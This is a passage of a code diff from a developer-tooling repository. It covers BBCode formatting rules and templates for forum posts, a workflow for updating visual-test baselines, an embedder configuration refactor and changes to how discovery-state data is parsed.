|
||||
|
||||
BBCode + Markdown 混合格式转换规则(论坛优化)。
|
||||
|
||||
## When to Use
|
||||
|
||||
| Phase | Usage | Section |
|
||||
|-------|-------|---------|
|
||||
| Phase 3 | 格式转换 | All sections |
|
||||
|
||||
---
|
||||
|
||||
## Core Principles
|
||||
|
||||
### 1. Pixel-Based Sizing
|
||||
|
||||
**重要**: 使用像素值而非 1-7 级别
|
||||
|
||||
| 元素 | Size (px) | 说明 |
|
||||
|------|-----------|------|
|
||||
| 主标题 (H1) | 150 | 文档标题 |
|
||||
| 章节标题 (H2) | 120 | 主要章节 |
|
||||
| 子标题 (H3) | 100 | 子章节 |
|
||||
| 正文 | (默认) | 不指定 size |
|
||||
| 备注/灰色 | 80 | 脚注、元数据 |
|
||||
|
||||
### 2. Supported Tags Only
|
||||
|
||||
**支持的 BBCode 标签**:
|
||||
- `[size=N]` - 字号(像素值)
|
||||
- `[color=X]` - 颜色(hex 或名称,如 `[color=blue]`、`[color=#2196F3]`)
|
||||
- `[b]`, `[i]`, `[s]`, `[u]` - 粗体、斜体、删除线、下划线
|
||||
- `[quote]` - 引用块
|
||||
- `[code]` - 代码块
|
||||
- `[url]`, `[img]` - 链接、图片
|
||||
- `[list]`, `[*]` - 列表
|
||||
- `[spoiler]` 或 `[spoiler=标题]` - 折叠/隐藏内容
|
||||
|
||||
**禁止使用的标签**:
|
||||
- `[align]` - 不渲染,显示为文本
|
||||
- `[hr]` - 不渲染,使用 Markdown `---`
|
||||
- `[table]` - 支持有限,避免使用
|
||||
|
||||
**HTML 标签转换** (输入时支持,转换为 BBCode):
|
||||
- `<mark>text</mark>` → `[color=yellow]text[/color]`
|
||||
- `<details><summary>标题</summary>内容</details>` → `[spoiler=标题]内容[/spoiler]`
|
||||
- 其他 HTML 标签 (`<div>`, `<span>`) - 删除
|
||||
|
||||
### 3. Markdown as Separator
|
||||
|
||||
分隔线使用 Markdown 语法:`---`
|
||||
|
||||
---
|
||||
|
||||
## Element Conversion Rules
|
||||
|
||||
### 标题转换
|
||||
|
||||
| Markdown | BBCode Output |
|
||||
|----------|---------------|
|
||||
| `# H1` | `[size=150][color=#2196F3][b]H1[/b][/color][/size]` |
|
||||
| `## H2` | `[size=120][color=#2196F3][b]H2[/b][/color][/size]` |
|
||||
| `### H3` | `[size=100][color=#333][b]H3[/b][/color][/size]` |
|
||||
| `#### H4+` | `[b]H4[/b]` (不加 size) |
|
||||
|
||||
### 文本样式
|
||||
|
||||
| Markdown/HTML | BBCode |
|
||||
|---------------|--------|
|
||||
| `**bold**` 或 `__bold__` | `[b]bold[/b]` |
|
||||
| `*italic*` 或 `_italic_` | `[i]italic[/i]` |
|
||||
| `***both***` | `[b][i]both[/i][/b]` |
|
||||
| `~~strike~~` | `[s]strike[/s]` |
|
||||
| `==highlight==` 或 `<mark>text</mark>` | `[color=yellow]highlight[/color]` |
|
||||
| (无 MD 语法) | `[u]underline[/u]` |
|
||||
|
||||
### 折叠内容
|
||||
|
||||
| HTML | BBCode |
|
||||
|------|--------|
|
||||
| `<details><summary>标题</summary>内容</details>` | `[spoiler=标题]内容[/spoiler]` |
|
||||
| (无 HTML) | `[spoiler]隐藏内容[/spoiler]` |
|
||||
|
||||
### 代码
|
||||
|
||||
| Markdown | BBCode |
|
||||
|----------|--------|
|
||||
| `` `inline` `` | 保持原样或 `[color=#9C27B0]inline[/color]` |
|
||||
| ` ```code``` ` | `[code]code[/code]` |
|
||||
|
||||
### 链接和图片
|
||||
|
||||
| Markdown | BBCode |
|
||||
|----------|--------|
|
||||
| `[text](url)` | `[url=url]text[/url]` |
|
||||
| `` | `[img]url[/img]` |
|
||||
|
||||
### 列表
|
||||
|
||||
```
|
||||
Markdown:
|
||||
- item 1
|
||||
- item 2
|
||||
- nested
|
||||
|
||||
BBCode:
|
||||
• item 1
|
||||
• item 2
|
||||
• nested
|
||||
```
|
||||
|
||||
注意:使用 `•` 符号而非 `[list][*]`,因为部分论坛渲染有问题。
|
||||
|
||||
### 引用
|
||||
|
||||
```
|
||||
Markdown:
|
||||
> quote text
|
||||
|
||||
BBCode:
|
||||
[quote]
|
||||
quote text
|
||||
[/quote]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Callout (标注) 转换
|
||||
|
||||
### Obsidian Callout 语法
|
||||
|
||||
```markdown
|
||||
> [!TYPE] 可选标题
|
||||
> 内容行 1
|
||||
> 内容行 2
|
||||
```
|
||||
|
||||
### 支持的 Callout 类型
|
||||
|
||||
| Type | Color | Icon | 中文标签 |
|
||||
|------|-------|------|----------|
|
||||
| note, info | #2196F3 | 📝 | 注意 / 信息 |
|
||||
| tip, hint | #4CAF50 | 💡 | 提示 |
|
||||
| success, check, done | #4CAF50 | ✅ | 成功 |
|
||||
| warning, caution, attention | #FF9800 | ⚠️ | 警告 |
|
||||
| danger, error, bug | #F44336 | ❌ | 危险 / 错误 |
|
||||
| example | #9C27B0 | 📋 | 示例 |
|
||||
| question, help, faq | #FF9800 | ❓ | 问题 |
|
||||
| quote, cite | gray | 💬 | 引用 |
|
||||
| abstract, summary, tldr | #2196F3 | 📄 | 摘要 |
|
||||
|
||||
### Callout 转换模板
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color={color}][b]{icon} {title}[/b][/color][/size]
|
||||
|
||||
{content}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
**示例**:
|
||||
|
||||
```markdown
|
||||
> [!WARNING] 注意事项
|
||||
> 这是警告内容
|
||||
```
|
||||
|
||||
转换为:
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#FF9800][b]⚠️ 注意事项[/b][/color][/size]
|
||||
|
||||
这是警告内容
|
||||
[/quote]
|
||||
```
|
||||
|
||||
### 可折叠 Callout
|
||||
|
||||
Obsidian 支持 `> [!NOTE]+` (展开) 和 `> [!NOTE]-` (折叠)。
|
||||
|
||||
由于 BBCode 不支持折叠,统一转换为普通 quote。
|
||||
|
||||
---
|
||||
|
||||
## Color Palette
|
||||
|
||||
### 语义颜色
|
||||
|
||||
| 语义 | Hex | 使用场景 |
|
||||
|------|-----|----------|
|
||||
| Primary | #2196F3 | 标题、链接、信息 |
|
||||
| Success | #4CAF50 | 成功、提示、特性 |
|
||||
| Warning | #FF9800 | 警告、注意 |
|
||||
| Error | #F44336 | 错误、危险 |
|
||||
| Purple | #9C27B0 | 示例、代码 |
|
||||
| Gray | gray | 备注、元数据 |
|
||||
| Dark | #333 | 子标题 |
|
||||
|
||||
### 颜色使用规则
|
||||
|
||||
1. **标题颜色**: H1/H2 使用 #2196F3,H3 使用 #333
|
||||
2. **Callout 颜色**: 根据类型使用语义颜色
|
||||
3. **备注颜色**: 使用 gray
|
||||
4. **强调颜色**: 根据语义选择(成功用绿色,警告用橙色)
|
||||
|
||||
---
|
||||
|
||||
## Spacing Rules
|
||||
|
||||
### 空行控制
|
||||
|
||||
| 元素 | 前空行 | 后空行 |
|
||||
|------|--------|--------|
|
||||
| 标题 | 1 | 1 |
|
||||
| 段落 | 0 | 1 |
|
||||
| 列表 | 0 | 1 |
|
||||
| 代码块 | 1 | 1 |
|
||||
| Callout | 1 | 1 |
|
||||
| 分隔线 `---` | 1 | 1 |
|
||||
|
||||
### 示例输出结构
|
||||
|
||||
```bbcode
|
||||
[size=150][color=#2196F3][b]文档标题[/b][/color][/size]
|
||||
|
||||
[size=80][color=gray]作者 | 日期[/color][/size]
|
||||
|
||||
---
|
||||
|
||||
[size=120][color=#2196F3][b]第一章节[/b][/color][/size]
|
||||
|
||||
正文内容...
|
||||
|
||||
[quote]
|
||||
[size=100][color=#4CAF50][b]💡 提示[/b][/color][/size]
|
||||
|
||||
提示内容
|
||||
[/quote]
|
||||
|
||||
---
|
||||
|
||||
[size=120][color=#2196F3][b]第二章节[/b][/color][/size]
|
||||
|
||||
更多内容...
|
||||
|
||||
---
|
||||
|
||||
[size=80][color=gray]— 全文完 —[/color][/size]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Quality Checklist
|
||||
|
||||
### 转换完整性
|
||||
|
||||
- [ ] 所有标题使用像素值 size
|
||||
- [ ] 未使用 `[align]` 或 `[hr]`
|
||||
- [ ] 分隔线使用 `---`
|
||||
- [ ] Callout 正确转换为 quote
|
||||
- [ ] 颜色符合语义规范
|
||||
- [ ] 空行控制正确
|
||||
|
||||
### 常见错误
|
||||
|
||||
| 错误 | 正确做法 |
|
||||
|------|----------|
|
||||
| `[size=5]` | `[size=120]` |
|
||||
| `[align=center]` | 删除,默认左对齐 |
|
||||
| `[hr]` | 使用 `---` |
|
||||
| `<div class="...">` | 删除 HTML 标签 |
|
||||
350
.claude/skills/text-formatter/templates/bbcode-template.md
Normal file
@@ -0,0 +1,350 @@
|
||||
# BBCode Template
|
||||
|
||||
论坛优化的 BBCode + Markdown 混合模板(像素级字号)。
|
||||
|
||||
## 核心规则
|
||||
|
||||
### 字号体系 (Pixels)
|
||||
|
||||
| 元素 | Size | 说明 |
|
||||
|------|------|------|
|
||||
| 主标题 | 150 | 文档标题 |
|
||||
| 章节标题 | 120 | H2 级别 |
|
||||
| 子标题 | 100 | H3 级别 |
|
||||
| 正文 | (默认) | 不指定 |
|
||||
| 备注 | 80 | 灰色小字 |
|
||||
|
||||
### 禁止使用
|
||||
|
||||
- `[align]` - 不渲染
|
||||
- `[hr]` - 不渲染,用 `---`
|
||||
- `[table]` - 支持有限
|
||||
- HTML 标签
|
||||
|
||||
---
|
||||
|
||||
## 文档模板
|
||||
|
||||
### 基础文档结构
|
||||
|
||||
```bbcode
|
||||
[size=150][color=#2196F3][b]{{title}}[/b][/color][/size]
|
||||
|
||||
[size=80][color=gray]{{metadata}}[/color][/size]
|
||||
|
||||
---
|
||||
|
||||
{{introduction}}
|
||||
|
||||
---
|
||||
|
||||
[size=120][color=#2196F3][b]{{section1_title}}[/b][/color][/size]
|
||||
|
||||
{{section1_content}}
|
||||
|
||||
---
|
||||
|
||||
[size=120][color=#2196F3][b]{{section2_title}}[/b][/color][/size]
|
||||
|
||||
{{section2_content}}
|
||||
|
||||
---
|
||||
|
||||
[size=80][color=gray]— 全文完 —[/color][/size]
|
||||
```
|
||||
|
||||
### 带目录的文档
|
||||
|
||||
```bbcode
|
||||
[size=150][color=#2196F3][b]{{title}}[/b][/color][/size]
|
||||
|
||||
[size=80][color=gray]{{author}} | {{date}}[/color][/size]
|
||||
|
||||
---
|
||||
|
||||
[size=100][b]📋 目录[/b][/size]
|
||||
|
||||
• {{section1_title}}
|
||||
• {{section2_title}}
|
||||
• {{section3_title}}
|
||||
|
||||
---
|
||||
|
||||
[size=120][color=#2196F3][b]{{section1_title}}[/b][/color][/size]
|
||||
|
||||
{{section1_content}}
|
||||
|
||||
---
|
||||
|
||||
[size=120][color=#2196F3][b]{{section2_title}}[/b][/color][/size]
|
||||
|
||||
{{section2_content}}
|
||||
|
||||
---
|
||||
|
||||
[size=120][color=#2196F3][b]{{section3_title}}[/b][/color][/size]
|
||||
|
||||
{{section3_content}}
|
||||
|
||||
---
|
||||
|
||||
[size=80][color=gray]— 全文完 —[/color][/size]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Callout 模板
|
||||
|
||||
### 提示 (Note/Info)
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#2196F3][b]📝 {{title}}[/b][/color][/size]
|
||||
|
||||
{{content}}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
### 技巧 (Tip/Hint)
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#4CAF50][b]💡 {{title}}[/b][/color][/size]
|
||||
|
||||
{{content}}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
### 成功 (Success)
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#4CAF50][b]✅ {{title}}[/b][/color][/size]
|
||||
|
||||
{{content}}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
### 警告 (Warning/Caution)
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#FF9800][b]⚠️ {{title}}[/b][/color][/size]
|
||||
|
||||
{{content}}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
### 危险/错误 (Danger/Error)
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#F44336][b]❌ {{title}}[/b][/color][/size]
|
||||
|
||||
{{content}}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
### 示例 (Example)
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#9C27B0][b]📋 {{title}}[/b][/color][/size]
|
||||
|
||||
{{content}}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
### 问题 (Question/FAQ)
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#FF9800][b]❓ {{title}}[/b][/color][/size]
|
||||
|
||||
{{content}}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
### 重要 (Important)
|
||||
|
||||
```bbcode
|
||||
[quote]
|
||||
[size=100][color=#F44336][b]⭐ {{title}}[/b][/color][/size]
|
||||
|
||||
{{content}}
|
||||
[/quote]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 代码展示模板
|
||||
|
||||
### 单代码块
|
||||
|
||||
```bbcode
|
||||
[size=100][color=#9C27B0][b]代码示例[/b][/color][/size]
|
||||
|
||||
[code]
|
||||
{{code}}
|
||||
[/code]
|
||||
|
||||
[size=80][color=gray]说明: {{description}}[/color][/size]
|
||||
```
|
||||
|
||||
### 带标题的代码
|
||||
|
||||
```bbcode
|
||||
[size=100][b]{{code_title}}[/b][/size]
|
||||
|
||||
[code]
|
||||
{{code}}
|
||||
[/code]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 特性展示模板
|
||||
|
||||
### 特性列表
|
||||
|
||||
```bbcode
|
||||
[size=120][color=#2196F3][b]功能特性[/b][/color][/size]
|
||||
|
||||
• [color=#4CAF50][b]✨ {{feature1}}[/b][/color] — {{desc1}}
|
||||
• [color=#2196F3][b]🚀 {{feature2}}[/b][/color] — {{desc2}}
|
||||
• [color=#FF9800][b]⚡ {{feature3}}[/b][/color] — {{desc3}}
|
||||
```
|
||||
|
||||
### 详细特性卡片
|
||||
|
||||
```bbcode
|
||||
[size=120][color=#2196F3][b]功能特性[/b][/color][/size]
|
||||
|
||||
[quote]
|
||||
[size=100][color=#4CAF50][b]✨ {{feature1_title}}[/b][/color][/size]
|
||||
|
||||
{{feature1_description}}
|
||||
|
||||
[size=80][color=gray]适用场景: {{feature1_use_case}}[/color][/size]
|
||||
[/quote]
|
||||
|
||||
[quote]
|
||||
[size=100][color=#2196F3][b]🚀 {{feature2_title}}[/b][/color][/size]
|
||||
|
||||
{{feature2_description}}
|
||||
|
||||
[size=80][color=gray]适用场景: {{feature2_use_case}}[/color][/size]
|
||||
[/quote]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 步骤指南模板
|
||||
|
||||
```bbcode
|
||||
[size=120][color=#2196F3][b]操作步骤[/b][/color][/size]
|
||||
|
||||
[size=100][color=#2196F3][b]步骤 1: {{step1_title}}[/b][/color][/size]
|
||||
|
||||
{{step1_content}}
|
||||
|
||||
[quote]
|
||||
[size=100][color=#FF9800][b]💡 提示[/b][/color][/size]
|
||||
|
||||
{{step1_tip}}
|
||||
[/quote]
|
||||
|
||||
[size=100][color=#2196F3][b]步骤 2: {{step2_title}}[/b][/color][/size]
|
||||
|
||||
{{step2_content}}
|
||||
|
||||
[size=100][color=#2196F3][b]步骤 3: {{step3_title}}[/b][/color][/size]
|
||||
|
||||
{{step3_content}}
|
||||
|
||||
---
|
||||
|
||||
[color=#4CAF50][b]✅ 完成![/b][/color] {{completion_message}}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 版本更新模板
|
||||
|
||||
```bbcode
|
||||
[size=150][color=#673AB7][b]🎉 版本 {{version}} 更新日志[/b][/color][/size]
|
||||
|
||||
---
|
||||
|
||||
[size=120][color=#4CAF50][b]✨ 新功能[/b][/color][/size]
|
||||
|
||||
• [b]{{new_feature1}}[/b]: {{new_feature1_desc}}
|
||||
• [b]{{new_feature2}}[/b]: {{new_feature2_desc}}
|
||||
|
||||
[size=120][color=#2196F3][b]🔧 改进[/b][/color][/size]
|
||||
|
||||
• {{improvement1}}
|
||||
• {{improvement2}}
|
||||
|
||||
[size=120][color=#F44336][b]🐛 修复[/b][/color][/size]
|
||||
|
||||
• {{bugfix1}}
|
||||
• {{bugfix2}}
|
||||
|
||||
---
|
||||
|
||||
[url={{download_url}}][b]📥 立即下载[/b][/url]
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## FAQ 模板
|
||||
|
||||
```bbcode
|
||||
[size=120][color=#2196F3][b]❓ 常见问题[/b][/color][/size]
|
||||
|
||||
---
|
||||
|
||||
[size=100][color=#333][b]Q: {{question1}}[/b][/color][/size]
|
||||
|
||||
[b]A:[/b] {{answer1}}
|
||||
|
||||
---
|
||||
|
||||
[size=100][color=#333][b]Q: {{question2}}[/b][/color][/size]
|
||||
|
||||
[b]A:[/b] {{answer2}}
|
||||
|
||||
---
|
||||
|
||||
[size=100][color=#333][b]Q: {{question3}}[/b][/color][/size]
|
||||
|
||||
[b]A:[/b] {{answer3}}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 转换检查清单
|
||||
|
||||
### 必须检查
|
||||
|
||||
- [ ] 标题使用像素值 (150/120/100)
|
||||
- [ ] 分隔线使用 `---`
|
||||
- [ ] 未使用 `[align]`
|
||||
- [ ] 未使用 `[hr]`
|
||||
- [ ] 未使用 HTML 标签
|
||||
- [ ] Callout 标题 size=100
|
||||
- [ ] 灰色备注 size=80
|
||||
|
||||
### 颜色规范
|
||||
|
||||
| 用途 | 颜色 |
|
||||
|------|------|
|
||||
| 主标题 | #2196F3 |
|
||||
| 章节标题 | #2196F3 |
|
||||
| 子标题 | #333 |
|
||||
| 成功/提示 | #4CAF50 |
|
||||
| 警告 | #FF9800 |
|
||||
| 错误/危险 | #F44336 |
|
||||
| 示例 | #9C27B0 |
|
||||
| 备注 | gray |
|
||||
@@ -7,9 +7,9 @@
|
||||
"properties": {
|
||||
"id": {
|
||||
"type": "string",
|
||||
"description": "Unique solution identifier: SOL-{issue-id}-{seq}",
|
||||
"pattern": "^SOL-.+-[0-9]+$",
|
||||
"examples": ["SOL-GH-123-1", "SOL-ISS-20251229-1"]
|
||||
"description": "Unique solution identifier: SOL-{issue-id}-{4-char-uid} where uid is 4 alphanumeric chars",
|
||||
"pattern": "^SOL-.+-[a-z0-9]{4}$",
|
||||
"examples": ["SOL-GH-123-a7x9", "SOL-ISS-20251229-001-b2k4"]
|
||||
},
|
||||
"description": {
|
||||
"type": "string",
|
||||
|
||||
@@ -444,6 +444,11 @@ EOF
|
||||
- `docs`: Documentation changes
|
||||
- `chore`: Maintenance tasks
|
||||
|
||||
**Commit Language**:
|
||||
- Use **Chinese** commit summary if project's `CLAUDE.md` specifies Chinese response guidelines or user explicitly requests Chinese
|
||||
- Use **English** commit summary by default or when project targets international collaboration
|
||||
- Check project's existing commit history for language convention consistency
|
||||
|
||||
**Output format:**
|
||||
```
|
||||
## Solution Committed: [solution_id]
|
||||
|
||||
24
.github/workflows/visual-tests.yml
vendored
@@ -1,11 +1,21 @@
|
||||
name: Visual Regression Tests
|
||||
|
||||
on:
|
||||
workflow_dispatch:
|
||||
inputs:
|
||||
update_baselines:
|
||||
description: 'Update baseline snapshots'
|
||||
required: false
|
||||
default: 'false'
|
||||
type: boolean
|
||||
pull_request:
|
||||
push:
|
||||
branches:
|
||||
- main
|
||||
|
||||
permissions:
|
||||
contents: write
|
||||
|
||||
jobs:
|
||||
visual-tests:
|
||||
runs-on: ubuntu-latest
|
||||
@@ -14,6 +24,8 @@ jobs:
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v4
|
||||
with:
|
||||
token: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
||||
- name: Setup Node.js
|
||||
uses: actions/setup-node@v4
|
||||
@@ -29,6 +41,18 @@ jobs:
|
||||
|
||||
- name: Run visual tests
|
||||
run: npm run test:visual
|
||||
env:
|
||||
CI: true
|
||||
CCW_VISUAL_UPDATE_BASELINE: ${{ inputs.update_baselines && '1' || '0' }}
|
||||
|
||||
- name: Commit updated baselines
|
||||
if: inputs.update_baselines == true
|
||||
run: |
|
||||
git config --local user.email "github-actions[bot]@users.noreply.github.com"
|
||||
git config --local user.name "github-actions[bot]"
|
||||
git add ccw/tests/visual/snapshots/baseline/
|
||||
git diff --staged --quiet || git commit -m "chore: update visual test baselines [skip ci]"
|
||||
git push
|
||||
|
||||
- name: Upload visual artifacts on failure
|
||||
if: failure()
|
||||
|
||||
@@ -26,7 +26,9 @@ except ImportError:
|
||||
sys.exit(1)
|
||||
|
||||
try:
|
||||
from codexlens.semantic.embedder import get_embedder, clear_embedder_cache
|
||||
from codexlens.semantic.factory import get_embedder as get_embedder_factory
|
||||
from codexlens.semantic.factory import clear_embedder_cache
|
||||
from codexlens.config import Config as CodexLensConfig
|
||||
except ImportError:
|
||||
print("Error: CodexLens not found. Install with: pip install codexlens[semantic]", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
@@ -35,8 +37,6 @@ except ImportError:
|
||||
class MemoryEmbedder:
|
||||
"""Generate and search embeddings for memory chunks."""
|
||||
|
||||
EMBEDDING_DIM = 768 # jina-embeddings-v2-base-code dimension
|
||||
|
||||
def __init__(self, db_path: str):
|
||||
"""Initialize embedder with database path."""
|
||||
self.db_path = Path(db_path)
|
||||
@@ -46,14 +46,61 @@ class MemoryEmbedder:
|
||||
self.conn = sqlite3.connect(str(self.db_path))
|
||||
self.conn.row_factory = sqlite3.Row
|
||||
|
||||
# Load CodexLens configuration for embedding settings
|
||||
try:
|
||||
self._config = CodexLensConfig.load()
|
||||
except Exception as e:
|
||||
print(f"Warning: Could not load CodexLens config, using defaults. Error: {e}", file=sys.stderr)
|
||||
self._config = CodexLensConfig() # Use default config
|
||||
|
||||
# Lazy-load embedder to avoid ~0.8s model loading for status command
|
||||
self._embedder = None
|
||||
self._embedding_dim = None
|
||||
|
||||
@property
|
||||
def embedding_dim(self) -> int:
|
||||
"""Get embedding dimension from the embedder."""
|
||||
if self._embedding_dim is None:
|
||||
# Access embedder to get its dimension
|
||||
self._embedding_dim = self.embedder.embedding_dim
|
||||
return self._embedding_dim
|
||||
|
||||
@property
|
||||
def embedder(self):
|
||||
"""Lazy-load the embedder on first access."""
|
||||
"""Lazy-load the embedder on first access using CodexLens config."""
|
||||
if self._embedder is None:
|
||||
self._embedder = get_embedder(profile="code")
|
||||
# Use CodexLens configuration settings
|
||||
backend = self._config.embedding_backend
|
||||
model = self._config.embedding_model
|
||||
use_gpu = self._config.embedding_use_gpu
|
||||
|
||||
# Use factory to create embedder based on backend type
|
||||
if backend == "fastembed":
|
||||
self._embedder = get_embedder_factory(
|
||||
backend="fastembed",
|
||||
profile=model,
|
||||
use_gpu=use_gpu
|
||||
)
|
||||
elif backend == "litellm":
|
||||
# For litellm backend, also pass endpoints if configured
|
||||
endpoints = self._config.embedding_endpoints
|
||||
strategy = self._config.embedding_strategy
|
||||
cooldown = self._config.embedding_cooldown
|
||||
|
||||
self._embedder = get_embedder_factory(
|
||||
backend="litellm",
|
||||
model=model,
|
||||
endpoints=endpoints if endpoints else None,
|
||||
strategy=strategy,
|
||||
cooldown=cooldown,
|
||||
)
|
||||
else:
|
||||
# Fallback to fastembed with code profile
|
||||
self._embedder = get_embedder_factory(
|
||||
backend="fastembed",
|
||||
profile="code",
|
||||
use_gpu=True
|
||||
)
|
||||
return self._embedder
|
||||
|
||||
def close(self):
|
||||
|
||||
@@ -1344,4 +1344,4 @@ export function getAvailableModelsForType(
|
||||
}
|
||||
|
||||
// Re-export types
|
||||
export type { ProviderCredential, CustomEndpoint, ProviderType, CacheStrategy, CodexLensEmbeddingRotation, CodexLensEmbeddingProvider, EmbeddingPoolConfig, RotationEndpointConfig };
|
||||
export type { ProviderCredential, CustomEndpoint, ProviderType, CacheStrategy, CodexLensEmbeddingRotation, CodexLensEmbeddingProvider, EmbeddingPoolConfig };
|
||||
|
||||
@@ -60,12 +60,30 @@ function readDiscoveryIndex(discoveriesDir: string): { discoveries: any[]; total
|
||||
if (existsSync(statePath)) {
|
||||
try {
|
||||
const state = JSON.parse(readFileSync(statePath, 'utf8'));
|
||||
|
||||
// Extract perspectives - handle both old and new formats
|
||||
let perspectives: string[] = [];
|
||||
if (state.perspectives && Array.isArray(state.perspectives)) {
|
||||
// New format: string array or old format: object array
|
||||
if (state.perspectives.length > 0 && typeof state.perspectives[0] === 'object') {
|
||||
perspectives = state.perspectives.map((p: any) => p.name || p.perspective || '');
|
||||
} else {
|
||||
perspectives = state.perspectives;
|
||||
}
|
||||
} else if (state.metadata?.perspectives) {
|
||||
// Legacy format
|
||||
perspectives = state.metadata.perspectives;
|
||||
}
|
||||
|
||||
// Extract created_at - handle both formats
|
||||
const created_at = state.created_at || state.metadata?.created_at;
|
||||
|
||||
discoveries.push({
|
||||
discovery_id: entry.name,
|
||||
target_pattern: state.target_pattern,
|
||||
perspectives: state.metadata?.perspectives || [],
|
||||
created_at: state.metadata?.created_at,
|
||||
completed_at: state.completed_at
|
||||
perspectives,
|
||||
created_at,
|
||||
completed_at: state.completed_at || state.updated_at
|
||||
});
|
||||
} catch {
|
||||
// Skip invalid entries
|
||||
@@ -110,29 +128,71 @@ function readDiscoveryProgress(discoveriesDir: string, discoveryId: string): any
|
||||
if (existsSync(statePath)) {
|
||||
try {
|
||||
const state = JSON.parse(readFileSync(statePath, 'utf8'));
|
||||
// New merged schema: perspectives array + results object
|
||||
|
||||
// Check if perspectives is an array
|
||||
if (state.perspectives && Array.isArray(state.perspectives)) {
|
||||
const completed = state.perspectives.filter((p: any) => p.status === 'completed').length;
|
||||
const total = state.perspectives.length;
|
||||
return {
|
||||
discovery_id: discoveryId,
|
||||
phase: state.phase,
|
||||
last_update: state.updated_at || state.created_at,
|
||||
progress: {
|
||||
perspective_analysis: {
|
||||
total,
|
||||
completed,
|
||||
in_progress: state.perspectives.filter((p: any) => p.status === 'in_progress').length,
|
||||
percent_complete: total > 0 ? Math.round((completed / total) * 100) : 0
|
||||
// Detect format: object array (old) vs string array (new)
|
||||
const isObjectArray = state.perspectives.length > 0 && typeof state.perspectives[0] === 'object';
|
||||
|
||||
if (isObjectArray) {
|
||||
// Old merged schema: perspectives is array of objects with status
|
||||
const completed = state.perspectives.filter((p: any) => p.status === 'completed').length;
|
||||
const total = state.perspectives.length;
|
||||
return {
|
||||
discovery_id: discoveryId,
|
||||
phase: state.phase,
|
||||
last_update: state.updated_at || state.created_at,
|
||||
progress: {
|
||||
perspective_analysis: {
|
||||
total,
|
||||
completed,
|
||||
in_progress: state.perspectives.filter((p: any) => p.status === 'in_progress').length,
|
||||
percent_complete: total > 0 ? Math.round((completed / total) * 100) : 0
|
||||
},
|
||||
external_research: state.external_research || { enabled: false, completed: false },
|
||||
aggregation: { completed: state.phase === 'aggregation' || state.phase === 'complete' },
|
||||
issue_generation: { completed: state.phase === 'complete', issues_count: state.results?.issues_generated || 0 }
|
||||
},
|
||||
external_research: state.external_research || { enabled: false, completed: false },
|
||||
aggregation: { completed: state.phase === 'aggregation' || state.phase === 'complete' },
|
||||
issue_generation: { completed: state.phase === 'complete', issues_count: state.results?.issues_generated || 0 }
|
||||
},
|
||||
agent_status: state.perspectives
|
||||
};
|
||||
agent_status: state.perspectives
|
||||
};
|
||||
} else {
|
||||
// New schema: perspectives is string array, status in perspectives_completed/perspectives_failed
|
||||
const total = state.perspectives.length;
|
||||
const completedList = state.perspectives_completed || [];
|
||||
const failedList = state.perspectives_failed || [];
|
||||
const completed = completedList.length;
|
||||
const failed = failedList.length;
|
||||
const inProgress = total - completed - failed;
|
||||
|
||||
return {
|
||||
discovery_id: discoveryId,
|
||||
phase: state.phase,
|
||||
last_update: state.updated_at || state.created_at,
|
||||
progress: {
|
||||
perspective_analysis: {
|
||||
total,
|
||||
completed,
|
||||
failed,
|
||||
in_progress: inProgress,
|
||||
percent_complete: total > 0 ? Math.round(((completed + failed) / total) * 100) : 0
|
||||
},
|
||||
external_research: state.external_research || { enabled: false, completed: false },
|
||||
aggregation: { completed: state.phase === 'aggregation' || state.phase === 'complete' },
|
||||
issue_generation: {
|
||||
completed: state.phase === 'complete',
|
||||
issues_count: state.results?.issues_generated || state.issues_generated || 0
|
||||
}
|
||||
},
|
||||
// Convert string array to object array for UI compatibility
|
||||
agent_status: state.perspectives.map((p: string) => ({
|
||||
name: p,
|
||||
status: completedList.includes(p) ? 'completed' : (failedList.includes(p) ? 'failed' : 'pending')
|
||||
}))
|
||||
};
|
||||
}
|
||||
}
|
||||
// Old schema: metadata.perspectives (backward compat)
|
||||
|
||||
// Legacy schema: metadata.perspectives (backward compat)
|
||||
if (state.metadata?.perspectives) {
|
||||
return {
|
||||
discovery_id: discoveryId,
|
||||
@@ -294,12 +354,20 @@ export async function handleDiscoveryRoutes(ctx: RouteContext): Promise<boolean>
|
||||
const enrichedDiscoveries = index.discoveries.map((d: any) => {
|
||||
const state = readDiscoveryState(discoveriesDir, d.discovery_id);
|
||||
const progress = readDiscoveryProgress(discoveriesDir, d.discovery_id);
|
||||
|
||||
// Extract statistics - handle both old and new formats
|
||||
// New format: stats in state.results object
|
||||
// Old format: stats directly in state
|
||||
const total_findings = state?.results?.total_findings ?? state?.total_findings ?? 0;
|
||||
const issues_generated = state?.results?.issues_generated ?? state?.issues_generated ?? 0;
|
||||
const priority_distribution = state?.results?.priority_distribution ?? state?.priority_distribution ?? {};
|
||||
|
||||
return {
|
||||
...d,
|
||||
